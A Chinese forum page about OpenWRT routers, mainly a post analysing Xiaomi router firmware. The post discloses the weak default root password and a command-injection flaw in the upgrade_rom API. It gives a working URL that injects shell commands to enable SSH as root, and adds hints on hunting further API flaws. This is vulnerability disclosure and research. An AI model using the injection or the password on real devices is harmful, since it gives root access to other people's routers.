刷了OpenWRT的无线路有能够干什么呢?首先它成了一台全须全尾的Linux机(当然说全须全尾是指linux内核部分,当然没有Xwindow部分--有了也没法接 ...不懂怎么刷openwrt。。。求教
linksys wrvs4400n
泡网分: 11.317
帖子: 1097
注册: 2006年09月
chm128256 发表于
150以内买华为HG255D吧,还可以的。~~~~~~~~~~~~~
这个路由器好像都买不到全新的货啦,网上都是改的货,不知道质量如何阿!担心,有没有可靠的货推荐呢?华为新出的有没有啥推荐的呢?谢谢啦!
泡网分: 39.045
帖子: 6565
注册: 2002年09月
无线路由也DIY
07:51:25A-A+
家里用的Linksys的WRT54G,性能稳定,基于web的设置界面也非常好用。实际上WRT54G(大部分Linksys产品也如此)采用Linux为操作系统的。而限于Gnu版权限制,它需要公开系统源码。所以在Linksys的网站上一般产品都有一个链接,可以下载整个系统的源码。既然是Linux,那么它的预装的bootloader选择就不多了,一般都是redboot。而Redboot是有固件下载升级支持的。于是很快有人就开始自己改Linksys的系统固件,再通过redboot等办法装到路由上。OpenWRT就是几个网上流行的后市场系统固件包之一。既然叫Open,它自然就是公开源码的而且是免费的。
OpenWRT最初是面对Linksys的家用无线路由的,这个从它的名字上也看得出来,不过后来渐渐扩展到其他牌子的家用无线路由上了。这里有一个详细列表,可以从中看到OpenWRT是否支持您的家用无线路由。
刷了OpenWRT的无线路有能够干什么呢?首先它成了一台全须全尾的Linux机(当然说全须全尾是指linux内核部分,当然没有Xwindow部分--有了也没法接显示器阿,至于内核模块和应用,看你有多大空间自己装了),你可以架设文件服务器,甚至打印机服务器等。路由方面,可以有路由/交换,虚拟局网,iptables防火墙,WDS无线路桥等等诸般扩展功能。还有就是可以做成一个无线网的监视器,专事监听,用来破解周围的无线接入点的WEP。
cchere.net
OpenWRT也有自己的系统设置网页,和Linksys原装的类似,都很好懂。另外OpenWRT会保留您原先的各种设置。原来的路由地址也保留,这样再进新的系统设置网页就用同一地址就好了。同样这网页上也有固件升级的选项。这样如果玩OpenWRT玩厌了,您还可以再把Linksys的固件刷回去。
当然如果只有设置网页作为界面,咱们也没必要刷机了。OpenWRT可以让您通过SSH进入,直接亲密接触Linux的终端界面。刷机后第一次进入先用 root来telnet。进入后系统会要求设置root的口令(默认值是没有口令)。设好退出后,telnet就从此被关闭了,以后将只能用ssh进入。
cchere.net
在OpenWRT网站上还有整个开发树的下载,可以下载来自己改Linux内核。该好后make包装成您自己的无线路由固件。
OpenWRT不是仅有的无线路由开源项目。DD-WRT是另一个选择,用它可以使廉价的Linksys的WRT54G成为一些昂贵的专业无线路有的替代品,提供很多高级功能,比如radius,网络监控等等。
(新浪博客提示:此博文已经过自动调整,以便在移动设备上查看)
泡网分: 39.045
帖子: 6565
注册: 2002年09月
yw1213 发表于
部署Go agent,翻墙用?这到是一个好办法
泡网分: 30.83
帖子: 10855
注册: 2006年04月
zieous 发表于
支持Openwrt有什么好处?部署Go agent,翻墙用?
泡网分: 39.045
帖子: 6565
注册: 2002年09月
支持Openwrt有什么好处?
泡网分: 8.159
注册: 2009年06月
150以内买华为HG255D吧,还可以的。
技术工人 发表于
同求,要求不要太高端了,150元以下的有没有什么产品?
泡网分: 11.317
帖子: 1097
注册: 2006年09月
同求,要求不要太高端了,150元以下的有没有什么产品?
泡网分: 15.391
注册: 2007年03月
参考官方的硬件列表应该没错
http://wiki.openwrt.org/toh/start
目测目前最合适的是TPLink的WDR4310,不过我自己没用过,不行别找我
据说今天是路由器的ARM年,也可以考虑等待 本帖最后由 youngxq 于
20:47 编辑
泡网分: 10.308
帖子: 8721
注册: 2012年02月
wndr3700v2
不到400块钱能买到的最高配置:
cpu: ar71xx 680MHz
wlan: 2.4GHz(2x2), 5Ghz(2x1)
switch: 1Gbps x 6 (实际只有5个)
emmc: 16MB
唯一的缺点是,天线内置,5G可以引出来,2.4G需要大改才能引。
泡网分: 29.544
帖子: 3635
注册: 2004年04月
用ar芯片的支持,最简单买个便宜的tp,甚至迅捷,水星都可以。
&版权所有:&&&&红米手机 &
高级手机控
扫码下载App一键签到 升级加速
基于OpenWRT智能路由器固件的分析思路探讨
&来自老版论坛
扫一扫!手机看帖更爽
什么是OpenWrt
OpenWr是一个适用于路由器的Linux发行版,和其他Linux发行版一样,它也内置了包管理工具,你可以从一个软件仓库里直接安装软件。OpenWrt可以用在所有需要嵌入式Linux的地方,它有众多功能,比如SSH服务器,VPN,甚至是BitTorrent客户端。
OpenWrt并不适合所有人,大多数人对自己的路由器自带固件已经很满意了,但许多高级用户则会使用像DD-WRT这样的嵌入式替代方案。但OpenWrt更灵活——本质上它是一个可安装于各种路由器的嵌入式Linux系统。OpenWrt有一个web交互界面,但如果你需要的只是一个有更多特性的web界面,还有其他一些路由器固件的替代方案会让你感觉更好。和DD-WRT一样,OpenWrt基于Linux而且比一些路由器自带的固件更稳定,要知道有些路由器一旦遇到大量连接就会比较让人着急了。
目前国内基于OpenWrt二次开发的路由器,小米路由器、极路由、迅雷路由、如意云 等
小米路由器固件介绍
小米MIWIFI系统固件下载 htt#p:#/#/#/miwifi_download.htm
小米路由器ROM固件,BCM 4709 ARM架构,采用OpenWRT为基础二次开发,r1d.bin稳定版文件大小:43.6 MB,内部名称brcm4709_hdd.bin猜的。r1d_beta.bin开发版文件大小:36.0 MB,似乎官网提供的是不完整包,需要update更新。
以下内容均为解压0.4.58稳定版固件后分析编写,日编译。
1、检测系统弱口令
解压固件找到shadow文件查看,发现管理员账户只有root一个
root:$1$mGrY9Gpt$vT7nVZg7fYnJ3rI5.UvJP0:99:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
对root的hash解密发现路由既然用弱root密码,这是稳定版吗?隐约感觉有些危险的气息。
秒破root密码为:admin
继续跟一下这个默认密码问题,发现似乎在手机端或web端访问hello页面初始化路由的时候就已经固化了这个密码,稳定版如果这样弄我觉得没必要区分开发版和稳定版了。 都可以做为开发模式使用了,小米路由团队发布的时候就没考虑好这个问题?而且这个默认密码也太弱了,随时都可能发生危险。
2、检测系统lua脚本执行函数
对关键字“Exec”的执行函数,审计可以发现\usr\lib\lua\luci\controller\api\xqsystem.lua存在一处命令执行漏洞。XQFunction.forkExec(string.format(&/usr/sbin/crontab_rom.sh %s %s %s&, url, hash, filesize))中URL参数无过滤带入执行。攻击者可构造“api/xqsystem/upgrade_rom?url=命令1;命令2;命令3”执行任意命令,由于Web是用root用户身份运行,恶意语句会以root身份执行任意命令。
已知利用方式,开启SSH,返回{&code&:0}执行成功。
首先用浏览器登录路由器管理平台,浏览器地址栏里显示这样的链接:192.168.31.1/cgi-bin/luci/;stok=f658e40eb863b7b23e89fb/web/home
将链接中的 /web/home 替换成 /api/xqsystem/upgrade_rom?url=%3Bnvram+set+ssh_en%3D1%3Bnvram+commit%3B%2Fetc%2Finit.d%2Fdropbear+start%3B
-- 直接执行升级脚本function upgradeRom()& & local XQFunction = require(&mon.XQFunction&)& & local XQSysUtil = require(&xiaoqiang.util.XQSysUtil&)& & local url = LuciHttp.formvalue(&url&)& & local filesize = tostring(LuciHttp.formvalue(&filesize&))& & local hash = tostring(LuciHttp.formvalue(&hash&))& & local result = {}& & local code = 0& & if XQSysUtil.checkBeenUpgraded() then& && &&&code = 1577& & elseif XQSysUtil.isUpgrading() then& && &&&code = 1568& & end& & result[&code&] = code& & if code ~= 0 then& && & result[&msg&] = XQErrorUtil.getErrorMessage(code)& & end& & LuciHttp.write_json(result)& & if code == 0 then& && &&&XQFunction.sysLock()& && &&&if url and filesize and hash then& && && && &XQFunction.forkExec(string.format(&/usr/sbin/crontab_rom.sh %s %s %s&, url, hash, filesize))& && &&&else& && && && &XQFunction.forkExec(&/usr/sbin/crontab_rom.sh&)& && &&&end& & endend
[color=rgb(51, 102, 153) !important]复制代码
3、分析路由系统文件
对于系统文件的分析话题太大,我只是粗略分析一些文件的作用。抛砖引玉,这里我整理一些lua、sh等系统文件,大家可以自己用文本编辑器打开查看源码,可以通过内容搜索lua、sh脚本审计是否存在漏洞。如果想深入要反编译*.so动态链接库文件等系统文件,可以使用IDA Pro。
开放API接口文件列表:
& & index.lua 预留
& & xqdatacenter.lua 数据中心
& & xqnetdetect.lua 网络状态检测
& & xqnetwork.lua 网络设置
& & xqpassport.lua 登陆接口
& & xqsmarthome.lua 智能家居
& & xqsystem.lua 系统设置
系统使用的类文件列表:
│&&XQEquipment.lua
│&&XQLog.lua
│&&XQPreference.lua
│&&XQPushHelper.lua
│&&XQVersion.lua
├─common
│& && &XQConfigs.lua
│& && &XQFunction.lua
& && &&&XQCacheUtil.lua
& && &&&XQCryptoUtil.lua
& && &&&XQDBUtil.lua
& && &&&XQDeviceUtil.lua
& && &&&XQDownloadUtil.lua
& && &&&XQErrorUtil.lua
& && &&&XQHttpUtil.lua
& && &&&XQLanWanUtil.lua
& && &&&XQMitvUtil.lua
& && &&&XQNetUtil.lua
& && &&&XQQoSUtil.lua
& && &&&XQSecureUtil.lua
& && &&&XQSysUtil.lua
& && &&&XQUPnPUtil.lua
& && &&&XQVPNUtil.lua
& && &&&XQWifiUtil.lua
系统使用的一些程序及脚本
/usr/share/xiaoqiang/public.pem
/usr/sbin/webinitrdr.monitor
/usr/sbin/waitctlc
/usr/sbin/uhbn
/usr/sbin/traffic.lua
/usr/sbin/tftpupgrade
/usr/sbin/syslog-ng.helper
/usr/sbin/sysapi.firewall
/usr/sbin/sysapi
/usr/sbin/supervisord
/usr/sbin/stopallmonitor.sh
/usr/sbin/ntpsetclock
/usr/sbin/noflushd
/usr/sbin/networkdt
/usr/sbin/macfilterctl
/usr/sbin/log_collection.sh
/usr/sbin/iptaccount.set.firewall
/usr/sbin/initmacfilterctl
/usr/sbin/gettraffic.lua
/usr/sbin/getstat.lua
/usr/sbin/fixnvram
/usr/sbin/firewall.webinitrdr
/usr/sbin/fanctrl.sh
/usr/sbin/fan_tmp.sh
/usr/sbin/crontab_rom.sh
/usr/sbin/cpureset
/usr/sbin/cpulimit_daemon.sh
/usr/sbin/config_pre_ota.sh
/usr/sbin/config_post_ota.sh
/usr/sbin/config_collection.sh
/usr/sbin/checkupgrade.lua
/usr/sbin/addnewmac
/usr/lib/lua/sysapi/traffic.lua
/usr/lib/lua/json.lua
/userdisk/userdisk.readme
/lib/config_post_ota/macfilter_config_post_ota.sh
/etc/init.d/webinitrdr
/etc/init.d/traffic.counter
/etc/init.d/tftpboot
/etc/init.d/resetbutton
/etc/init.d/noflushd
/etc/init.d/networkdt
/etc/init.d/fantmp
/etc/init.d/cpulimit
/etc/config/macfilter
/etc/config/fanctrl
/bin/safeflash.sh
/bin/mkxqimage
/bin/flash_check.sh
/bin/flash.sh
/bin/cpulimit
系统内部文件
/etc/config/account
/etc/config/push
/etc/config/xiaoqiang
/etc/xqDb sqlite数据库
/usr/lib/lua/rc4.lua
/usr/lib/lua/service/util/ServiceErrorUtil.lua
/usr/lib/lua/sha1.lua
/usr/lib/lua/slaxdom.lua
/usr/lib/lua/slaxml.lua
/usr/lib/lua/xiaoqiang/common/XQConfigs.lua
/usr/lib/lua/xiaoqiang/common/XQFunction.lua
/usr/lib/lua/xiaoqiang/util/XQCacheUtil.lua
/usr/lib/lua/xiaoqiang/util/XQCryptoUtil.lua
/usr/lib/lua/xiaoqiang/util/XQDBUtil.lua
/usr/lib/lua/xiaoqiang/util/XQDeviceUtil.lua
/usr/lib/lua/xiaoqiang/util/XQDownloadUtil.lua
/usr/lib/lua/xiaoqiang/util/XQErrorUtil.lua
/usr/lib/lua/xiaoqiang/util/XQHttpUtil.lua
/usr/lib/lua/xiaoqiang/util/XQLanWanUtil.lua
/usr/lib/lua/xiaoqiang/util/XQMitvUtil.lua
/usr/lib/lua/xiaoqiang/util/XQNetUtil.lua
/usr/lib/lua/xiaoqiang/util/XQQoSUtil.lua
/usr/lib/lua/xiaoqiang/util/XQSecureUtil.lua
/usr/lib/lua/xiaoqiang/util/XQSysUtil.lua
/usr/lib/lua/xiaoqiang/util/XQUPnPUtil.lua
/usr/lib/lua/xiaoqiang/util/XQVPNUtil.lua
/usr/lib/lua/xiaoqiang/util/XQWifiUtil.lua
/usr/lib/lua/xiaoqiang/XQEquipment.lua
/usr/lib/lua/xiaoqiang/XQLog.lua
/usr/lib/lua/xiaoqiang/XQPreference.lua
/usr/lib/lua/xiaoqiang/XQPushHelper.lua
/usr/lib/lua/xiaoqiang/XQVersion.lua
/usr/lib/lua/xqcrypto.so
/usr/lib/lua/xssFilter.lua
/usr/sbin/feedPush
/usr/share/xiaoqiang/oui.zip
4、分析路由系统开放API接口
由于OpenWRT的Web控制都是使用lua脚本编写,只要拿到固件解压后查看lua都是源码,所以如果大家想写程序调用路由API的话,等待官方出文档肯定都是慢半拍的。所以如果需要的话可以自己阅读代码然后根据要求自己写。快速搞定哈!
怎么找漏洞?API有些是管理员调用,有一些是不需要管理员就可以使用的。小米路由器0x09的是不需要登录就可以使用的API,具体细节可以参考:\usr\lib\lua\luci\dispatcher.lua,搜索关键字“track.flag”。这只是越权调用API,当然如果你有耐心可以每个函数都看看没准还能发一些高危漏洞。
r1d\usr\lib\lua\luci\controller\api\xqdatacenter.lua (8 hits)entry({&api&, &xqdatacenter&}, firstchild(), _(&&), 300)entry({&api&, &xqdatacenter&, &request&}, call(&tunnelRequest&), _(&&), 301)entry({&api&, &xqdatacenter&, &identify_device&}, call(&identifyDevice&), _(&&), 302, 0x08)entry({&api&, &xqdatacenter&, &download&}, call(&download&), _(&&), 303)entry({&api&, &xqdatacenter&, &upload&}, call(&upload&), _(&&), 304)entry({&api&, &xqdatacenter&, &thumb&}, call(&getThumb&), _(&&), 305)entry({&api&, &xqdatacenter&, &device_id&}, call(&getDeviceId&), _(&&), 306)entry({&api&, &xqdatacenter&, &check_file_exist&}, call(&checkFileExist&), _(&&), 307)r1d\usr\lib\lua\luci\controller\api\xqnetdetect.lua (6 hits)entry({&api&, &xqnetdetect&}, firstchild(), _(&&), 350)entry({&api&, &xqnetdetect&, &wan_status&}, call(&getWanStatus&), _(&&), 351, 0x01)entry({&api&, &xqnetdetect&, &sys_info&}, call(&getSysInfo&), (&&), 352, 0x01)entry({&api&, &xqnetdetect&, &ping_test&}, call(&pingTest&), (&&), 353, 0x01)entry({&api&, &xqnetdetect&, &detect&}, call(&systemDiagnostics&), (&&), 354, 0x01)entry({&api&, &xqnetdetect&, &sys_status&}, call(&systemStatus&), (&&), 355, 0x01)r1d\usr\lib\lua\luci\controller\api\xqnetwork.lua (30 hits)entry({&api&, &xqnetwork&}, firstchild(), (&&), 200)entry({&api&, &xqnetwork&, &wifi_status&}, call(&getWifiStatus&), (&&), 201)entry({&api&, &xqnetwork&, &wifi_detail&}, call(&getWifiInfo&), (&&), 202)entry({&api&, &xqnetwork&, &wifi_detail_all&}, call(&getAllWifiInfo&), (&&), 202)entry({&api&, &xqnetwork&, &wifi_connect_devices&}, call(&getWifiConDev&), (&&), 203)entry({&api&, &xqnetwork&, &wifi_txpwr_channel&}, call(&getWifiChTx&), (&&), 204)-- entry({&api&, &xqnetwork&, &set_wifi_txpwr_channel&}, call(&setWifiChTx&), (&&), 205)entry({&api&, &xqnetwork&, &set_wifi_txpwr&}, call(&setWifiTxpwr&), (&&), 205)entry({&api&, &xqnetwork&, &wifi_up&}, call(&turnOnWifi&), (&&), 206)entry({&api&, &xqnetwork&, &wifi_down&}, call(&shutDownWifi&), (&&), 207)entry({&api&, &xqnetwork&, &set_wifi&}, call(&setWifi&), (&&), 208)--entry({&api&, &xqnetwork&, &get_scan_list&}, call(&get_scan_list&), (&&), 209, true)--entry({&api&, &xqnetwork&, &wifi_ctl_scan&}, call(&wifi_ctl_scan&), (&&), 210)--entry({&api&, &xqnetwork&, &get_bridge&}, call(&get_bridge&), (&&), 211, true)--entry({&api&, &xqnetwork&, &set_bridge&}, call(&set_bridge&), (&&), 212)entry({&api&, &xqnetwork&, &lan_info&}, call(&getLanInfo&), (&&), 213)entry({&api&, &xqnetwork&, &wan_info&}, call(&getWanInfo&), (&&), 214)entry({&api&, &xqnetwork&, &lan_dhcp&}, call(&getLanDhcp&), (&&), 215)entry({&api&, &xqnetwork&, &wan_down&}, call(&wanDown&), (&&), 216)entry({&api&, &xqnetwork&, &wan_up&}, call(&wanUp&), (&&), 217)entry({&api&, &xqnetwork&, &check_wan_type&}, call(&getAutoWanType&), (&&), 218, 0x08)entry({&api&, &xqnetwork&, &wan_statistics&}, call(&getWanStatistics&), (&&), 219)entry({&api&, &xqnetwork&, &devices_statistics&}, call(&getDevsStatistics&), (&&), 220)entry({&api&, &xqnetwork&, &device_statistics&}, call(&getDevStatistics&), (&&), 221)entry({&api&, &xqnetwork&, &set_lan_ip&}, call(&setLanIp&), (&&), 222)entry({&api&, &xqnetwork&, &set_wan&}, call(&setWan&), (&&), 223, 0x08)entry({&api&, &xqnetwork&, &set_lan_dhcp&}, call(&setLanDhcp&), (&&), 224)entry({&api&, &xqnetwork&, &mac_clone&}, call(&setWanMac&), (&&), 225)entry({&api&, &xqnetwork&, &set_all_wifi&}, call(&setAllWifi&), (&&), 226)entry({&api&, &xqnetwork&, &avaliable_channels&}, call(&getChannels&), (&&), 227)r1d\usr\lib\lua\luci\controller\api\xqpassport.lua (10 hits)entry({&api&, &xqpassport&}, firstchild(), (&&), 400)entry({&api&, &xqpassport&, &login&}, call(&passportLogin&), (&&), 401, 0x01)entry({&api&, &xqpassport&, &userInfo&}, call(&getUserInfo&), (&&), 402)entry({&api&, &xqpassport&, &rigister&}, call(&routerRegister&), (&&), 405, 0x01)entry({&api&, &xqpassport&, &binded&}, call(&getBindInfo&), (&&), 406, 0x01)entry({&api&, &xqpassport&, &plugin_list&}, call(&pluginList&), (&&), 407)entry({&api&, &xqpassport&, &plugin_enable&}, call(&pluginEnable&), (&&), 408)entry({&api&, &xqpassport&, &plugin_disable&}, call(&pluginDisable&), (&&), 409)entry({&api&, &xqpassport&, &plugin_detail&}, call(&pluginDetail&), (&&), 410)entry({&api&, &xqpassport&, &unbound&}, call(&unboundRouter&), (&&), 411)r1d\usr\lib\lua\luci\controller\api\xqsmarthome.lua (5 hits)entry({&api&, &xqsmarthome&}, firstchild(), _(&&), 500)entry({&api&, &xqsmarthome&, &request&}, call(&tunnelSmartHomeRequest&), _(&&), 501)entry({&api&, &xqsmarthome&, &request_smartcontroller&}, call(&tunnelSmartControllerRequest&), _(&&), 502)entry({&api&, &xqsmarthome&, &request_miio&}, call(&tunnelMiioRequest&), _(&&), 503)entry({&api&, &xqsmarthome&, &request_mitv&}, call(&requestMitv&), _(&&), 504)r1d\usr\lib\lua\luci\controller\api\xqsystem.lua (71 hits)entry({&api&, &xqsystem&}, firstchild(), (&&), 100)entry({&api&, &xqsystem&, &login&}, call(&actionLogin&), (&&), 109, 0x08)entry({&api&, &xqsystem&, &init_info&}, call(&getInitInfo&), (&&), 101, 0x09)entry({&api&, &xqsystem&, &token&}, call(&getToken&), (&&), 103, 0x08)entry({&api&, &xqsystem&, &set_inited&}, call(&setInited&), (&&), 103, 0x08)entry({&api&, &xqsystem&, &system_info&}, call(&getSysInfo&), (&&), 104, 0x01)entry({&api&, &xqsystem&, &set_name_password&}, call(&setPassword&), (&&), 105)entry({&api&, &xqsystem&, &check_rom_update&}, call(&checkRomUpdate&), (&&), 106)entry({&api&, &xqsystem&, &lan_wan&}, call(&getLanWanSta&), (&&), 106)entry({&api&, &xqsystem&, &flash_rom&}, call(&flashRom&), (&&), 108)entry({&api&, &xqsystem&, &router_name&}, call(&getRouterName&), (&&), 110)entry({&api&, &xqsystem&, &set_router_name&}, call(&setRouterName&), (&&), 111)entry({&api&, &xqsystem&, &device_list&}, call(&getDeviceList&), (&&), 112)entry({&api&, &xqsystem&, &set_device_nickname&}, call(&setDeviceNickName&), (&&), 113)entry({&api&, &xqsystem&, &internet_connect&}, call(&isInternetConnect&), (&&), 114)entry({&api&, &xqsystem&, &upload_rom&}, call(&uploadRom&), (&&), 115)entry({&api&, &xqsystem&, &get_languages&}, call(&getLangList&), (&&), 118, 0x01)entry({&api&, &xqsystem&, &get_main_language&}, call(&getMainLang&), (&&), 119, 0x01)entry({&api&, &xqsystem&, &set_language&}, call(&setLang&), (&&), 120)entry({&api&, &xqsystem&, &upload_log&}, call(&uploadLogFile&), (&&), 124)entry({&api&, &xqsystem&, &backup_config&}, call(&uploadConfigFile&), (&&), 125)entry({&api&, &xqsystem&, &config_recovery&}, call(&configRecovery&), (&&), 126)entry({&api&, &xqsystem&, &router_init&}, call(&setRouter&), (&&), 126, 0x08)entry({&api&, &xqsystem&, &information&}, call(&getAllInfo&), (&&), 127)entry({&api&, &xqsystem&, &status&}, call(&getStatusInfo&), (&&), 128)entry({&api&, &xqsystem&, &count&}, call(&getConDevCount&), (&&), 129)entry({&api&, &xqsystem&, &reboot&}, call(&reboot&), (&&), 130)entry({&api&, &xqsystem&, &reset&}, call(&reset&), (&&), 131)entry({&api&, &xqsystem&, &passport_bind_info&}, call(&getPassportBindInfo&), (&&), 132, 0x01)entry({&api&, &xqsystem&, &set_passport_bound&}, call(&setPassportBound&), (&&), 133, 0x08)entry({&api&, &xqsystem&, &get_sys_avg_load&}, call(&getSysAvgLoad&), (&&), 134)entry({&api&, &xqsystem&, &set_mac_filter&}, call(&setMacFilter&), (&&), 135)entry({&api&, &xqsystem&, &renew_token&}, call(&renewToken&), (&&), 136)entry({&api&, &xqsystem&, &remove_passport_info&}, call(&removePassportBindInfo&), (&&), 137)entry({&api&, &xqsystem&, &upgrade_rom&}, call(&upgradeRom&), (&&), 138)entry({&api&, &xqsystem&, &wps&}, call(&openWps&), (&&), 139, 0x08)entry({&api&, &xqsystem&, &wps_status&}, call(&getWpsStatus&), (&&), 140)entry({&api&, &xqsystem&, &stop_nginx&}, call(&stopNginx&), (&&), 141)entry({&api&, &xqsystem&, &check_router_name_pending&}, call(&checkRouterNamePending&), (&&), 142)entry({&api&, &xqsystem&, &clear_router_name_pending&}, call(&clearRouterNamePending&), (&&), 143)entry({&api&, &xqsystem&, &web_url&}, call(&redirectUrl&), (&&), 144)entry({&api&, &xqsystem&, &start_nginx&}, call(&startNginx&), (&&), 145)entry({&api&, &xqsystem&, &nginx&}, call(&nginxCacheStatus&), (&&), 146)entry({&api&, &xqsystem&, &flash_status&}, call(&flashStatus&), (&&), 147, 0x01)entry({&api&, &xqsystem&, &upgrade_status&}, call(&upgradeStatus&), (&&), 148, 0x0d)entry({&api&, &xqsystem&, &create_sandbox&}, call(&createSandbox&), (&&), 149)entry({&api&, &xqsystem&, &is_sandbox_created&}, call(&isSandboxCreated&), (&&), 150)entry({&api&, &xqsystem&, &mount_things&}, call(&mountThings&), (&&), 151)entry({&api&, &xqsystem&, &umount_things&}, call(&umountThings&), (&&), 152)entry({&api&, &xqsystem&, &are_things_mounted&}, call(&areThingsMounted&), (&&), 153)entry({&api&, &xqsystem&, &start_dropbear&}, call(&startDropbear&), (&&), 154)entry({&api&, &xqsystem&, &stop_dropbear&}, call(&stopDropbear&), (&&), 155)entry({&api&, &xqsystem&, &is_dropbear_started&}, call(&isDropbearStarted&), (&&), 156)entry({&api&, &xqsystem&, &main_status_for_app&}, call(&mainStatusForApp&), (&&), 157)entry({&api&, &xqsystem&, &mode&}, call(&getMacfilterMode&), (&&), 158)entry({&api&, &xqsystem&, &set_mode&}, call(&setMacfilterMode&), (&&), 159)entry({&api&, &xqsystem&, &cancel&}, call(&cancelUpgrade&), (&&), 160, 0x0d)entry({&api&, &xqsystem&, &shutdown&}, call(&shutdown&), (&&), 161)entry({&api&, &xqsystem&, &upnp&}, call(&upnpList&), (&&), 162)entry({&api&, &xqsystem&, &upnp_switch&}, call(&upnpSwitch&), (&&), 163)entry({&api&, &xqsystem&, &app_limit&}, call(&appLimit&), (&&), 164)entry({&api&, &xqsystem&, &app_limit_switch&}, call(&appLimitSwitch&), (&&), 165)entry({&api&, &xqsystem&, &set_app_limit&}, call(&setAppLimit&), (&&), 166)entry({&api&, &xqsystem&, &vpn&}, call(&vpnInfo&), (&&), 167)entry({&api&, &xqsystem&, &vpn_status&}, call(&vpnStatus&), (&&), 168)entry({&api&, &xqsystem&, &vpn_switch&}, call(&vpnSwitch&), (&&), 169)entry({&api&, &xqsystem&, &set_vpn&}, call(&setVpn&), (&&), 170)entry({&api&, &xqsystem&, &device_mac&}, call(&getDeviceMacaddr&), (&&), 171, 0x01)entry({&api&, &xqsystem&, &wps_cancel&}, call(&stopWps&), (&&), 172)entry({&api&, &xqsystem&, &detection_ts&}, call(&getDetectionTimestamp&), (&&), 173)entry({&api&, &xqsystem&, &wifi_log&}, call(&getWifiLog&), (&&), 174)
[color=rgb(51, 102, 153) !important]复制代码
[color=rgb(51, 102, 153) !important]
扫描二维码,手机查看本帖
·来自老版论坛
我就是一菜鸟,表示根本看不懂{:2_27:}
·来自老版论坛
密码是跟着管理密码变化的,估计楼主的管理密码是admin
·来自老版论坛
没别的意思,只是让官方注意下安全,如果安全输在了起点上,电脑再安全都没用
哦,别介意只是随便说说,最新开发版0.9.2已经修复ssh了
·来自老版论坛
不明觉厉呀。。。这才是真的技术贴呀!
·来自老版论坛
你想让官方回复什么,人家量产版故意关闭了ssh,根本就没想让用户涉足这部分,so。。。 ...
没别的意思,只是让官方注意下安全,如果安全输在了起点上,电脑再安全都没用
·来自老版论坛
有58的bin吗?我手贱升级了,找不到降回去的文件了。
有的~/s/1mg5aiZe
·来自老版论坛
用u盘降级到58~小米不地道~
有58的bin吗?我手贱升级了,找不到降回去的文件了。
·来自老版论坛
很牛的分享~!!!!!!
·来自老版论坛
ssh root登录对于玩家来说不是问题,官方是无法封堵的,极路由的所以版本都可轻松打开ssh,小米路由也不会 ...
我是听说最新开发版给堵上了。。。
·来自老版论坛
技术贴,必回!!!!!!!
·来自老版论坛
强,就这样被破了,晚上回去试试
·来自老版论坛
隐约一股内部人士的味道飘了过来
·来自老版论坛
希望大神留步,常来反映。我们可以加个群 没事给我们科普一下
你以上内容我估计我就看懂了10%
·来自老版论坛
58据说是可以的,可以现在已经59了...
用u盘降级到58~小米不地道~
·来自老版论坛
不是同一人的帖子……
/thread--1.html
wooyun.org/bugs/wooyun- ...
58据说是可以的,可以现在已经59了...
·来自老版论坛
不是同一人的帖子……
/thread--1.html
wooyun.org/bugs/wooyun-
·来自老版论坛
同求打开SSH的方法!!!!
前面的帖子有了,自己看看去。这篇应该是乌云上面的扩展吧~
小米路由团队的开发水平实在不敢恭维
·来自老版论坛
最新版本怎么打开呢?
按照iPhone越狱的规矩,不提供测试版的越狱,防止漏洞被堵上,所以要等小米正式版推出新版后才能公布方法。
·来自老版论坛
我就是一菜鸟,表示根本看不懂{:6_215:}
·来自老版论坛
强,就这样被破了,晚上回去试试
京ICP证110507号 京ICP备号}
我要回帖
更多关于 路由器刷openwrt 的文章
更多推荐
- ·正准备入手库博光学纯晰月抛好用吗清氧清,大家有什么建议吗?
- ·听说GiGi家的太空什么叫记忆棉棉行车套装颜色选择很多,是真的吗?
- ·求解一道七年级上册数学几何题50道及答案几何题,有图。
- ·谁认识这四个字求答案三个字。是什么意思?
- ·我能用中国邮政可以贷款吗?有什么贷款条件银行的抵押贷款还中邮钱包的网贷吗?
- ·王者荣耀头脑风暴软件
- ·电视的设置在哪里找不到电视机开机找不到信号的设置
- ·鑫谷昆仑 KL-1080的免费线材优化软件摸上去很软,在大电流大功率时表现如何呢?
- ·我笔记本和舍友配置一样他的舍友不怀好意微盘一点都不卡我玩游戏就很卡 吃鸡fps一直都是30左右
- ·手机壳背面标志不认识交通标志 有大佬说是厂家自己设计为了好看是真的吗?因为意义重大所以没办法换 又一直掉
- ·新奔腾B5xc60运动版与普通版和普通版有什么不同?
- ·二匹空调:格力空调直营店牌多少钱?
- ·新奔腾B50新中式建筑外观效果图上面有什么变化吗?
- ·想换171手机号怎么查话费了,但171手机号怎么查话费里还有很多话费,怎么办???
- ·新奔腾x80原厂导航升级B50有哪些方面的升级?
- ·魅蓝note6拆机图解6所机了怎么办?
- ·国内专业多屏炒股电脑有多少,华兴卓睿的职业炒股多屏电脑配置怎么样?
- ·液晶电视什么电视机品牌好品牌好
- ·映泰b350et2安装win7Z370GT7散热怎么样?
- ·安卓系统和openwrt系统哪个做路由器刷openwrt更好
- ·努比亚z17s拍对比苹果x拍照和苹果哪个好
- ·奥克斯破壁料理机机和普通料理机,哪个更适用
- ·怎么的只有右边有声音,M1L迅雷边下边播只有声音到底几个喇叭
- ·联想小新锐7000评测 F1+F12键盘怎么设置才能不安FN使用F1-F12
- ·奔腾B50的车内空间大小看什么不大?
- ·一加手机怎么软件分身五手机微信可以分身吗?
- ·佳能m5 还是eos相机3D是一台什么相机
- ·想用i7 8700kcpu处理器 7700k i7搭配个Z370 GODLIKE GAMING主板玩超频,搭配1070ti显卡用600w电源可以么?
- ·魅求助#魅蓝3s刷iphone8plus微信掉帧朋友圈严重掉帧
- ·华为p9怎么卸载软件用什么埋雷软件
- ·进项税逾期未待抵扣进项税申请重新待抵扣进项税,税局同意并办理了相关手续后,后续申报如何操作,报表如何填写?
- ·有没有值得推荐的家装深圳分销管理软件推荐
- ·侨特购微信小店没有购物车是什么
- ·银行卡被法院冻结银行卡了,里面有600块钱用不了,还倒欠了八万该怎么处理这件事?
